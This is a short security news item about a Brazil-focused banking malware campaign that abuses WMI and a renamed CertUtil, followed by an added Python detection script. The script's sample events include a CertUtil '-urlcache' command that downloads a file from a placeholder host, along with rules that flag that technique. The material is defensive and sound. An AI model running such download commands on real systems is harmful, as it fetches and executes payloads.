Researchers have detected a [malware campaign focused on Brazil](https://blog.trendmicro.com/trendlabs-security-intelligence/malware-targeting-brazil-uses-legitimate-windows-components-wmi-and-certutil-as-part-of-its-routine/) that abuses legitimate Windows components, Windows Management Instrumentation (WMI) and CertUtil (a utility that, among other functions, lets users view and configure certificate information), to download malicious payloads.
The campaign begins with emails that claim to come from the Brazilian Post Office, notifying the victim that an order could not be delivered and that, for more information, they need to access a tracking code, which downloads a zip file to the computer. After this step, an LNK file is used to run scripts from the command-and-control (C&C) server through WMI. To cover their tracks, the attackers use a copy of CertUtil stored in a temporary folder under a different name.
After analysing the payload, the researchers say that it is banking malware that activates only if the target computer's language is set to Portuguese, indicating that the likely targets of the attack are Brazil and, perhaps, Portugal. Users are advised to be wary of emails that look suspicious and to avoid downloading suspicious or unsolicited files.
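The chain described above (scripts launched through WMI, then a renamed copy of CertUtil in a temporary folder fetching the payload) leaves traces in process-creation telemetry that a defender can match on. The following is an added detection example; it is not code from the Trend Micro report or from the campaign. It assumes Sysmon-style process-creation fields (`Image`, `OriginalFileName`, `ParentImage`, `CommandLine`), and the sample events, paths and file names are constructed for the example. The `-urlcache` switch used in rule 3 is CertUtil's own URL-fetch option, not something the article mentions.

```python
import ntpath

# Constructed sample process-creation events, loosely modelled on Sysmon
# Event ID 1 fields. All paths, names and URLs here are made up for this
# example; none are indicators from the actual campaign.
SAMPLE_EVENTS = [
    {   # benign: CertUtil run from its normal location by an admin shell
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "certutil -dump",
    },
    {   # renamed copy of CertUtil in a temp folder, used as a downloader
        "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
        "OriginalFileName": "CertUtil.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "svc.exe -urlcache -split -f http://example.invalid/p.bin p.bin",
    },
    {   # script host spawned by the WMI provider host
        "Image": r"C:\Windows\System32\wscript.exe",
        "OriginalFileName": "wscript.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"wscript.exe C:\Users\alice\AppData\Local\Temp\run.vbs",
    },
    {   # benign: ordinary application launched from the desktop shell
        "Image": r"C:\Program Files\Browser\browser.exe",
        "OriginalFileName": "browser.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "browser.exe",
    },
]

# Interpreters that WMI-driven execution commonly hands a script to.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _base(path):
    """Lower-cased file name component of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return the list of rule names the event triggers (empty if nothing matched)."""
    hits = []
    image = _base(ev.get("Image", ""))
    image_path = ev.get("Image", "").lower()
    orig = ev.get("OriginalFileName", "").lower()
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()

    # OriginalFileName comes from the PE version resource, so renaming the
    # file on disk does not change it; this is what defeats the rename trick.
    is_certutil = orig == "certutil.exe"

    # Rule 1: the binary is CertUtil but runs under another file name.
    if is_certutil and image != "certutil.exe":
        hits.append("renamed_certutil")
    # Rule 2: CertUtil executing from a temp directory instead of System32.
    if is_certutil and "\\temp\\" in image_path:
        hits.append("certutil_in_temp")
    # Rule 3: CertUtil used as a downloader via its -urlcache switch.
    if is_certutil and "urlcache" in cmd:
        hits.append("certutil_download")
    # Rule 4: the WMI provider host spawning a script interpreter.
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        hits.append("wmi_spawned_script_host")
    return hits


def scan(events):
    """Map event index -> triggered rules, for events that trigger at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], "->", ", ".join(rules))
```

Rules 1 and 2 are the ones that matter for this campaign: matching on the PE original file name rather than the on-disk name means the "copy of CertUtil stored in a temporary folder with a different name" still surfaces, while legitimate CertUtil use from System32 is left alone. Rule 4 is noisier in real environments and is best tuned against a baseline of what WmiPrvSE.exe normally launches.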
Article originally published in the Tempest Soundbites app, available to Tempest customers on Android and iOS versions. To get a credential, talk to your relationship manager.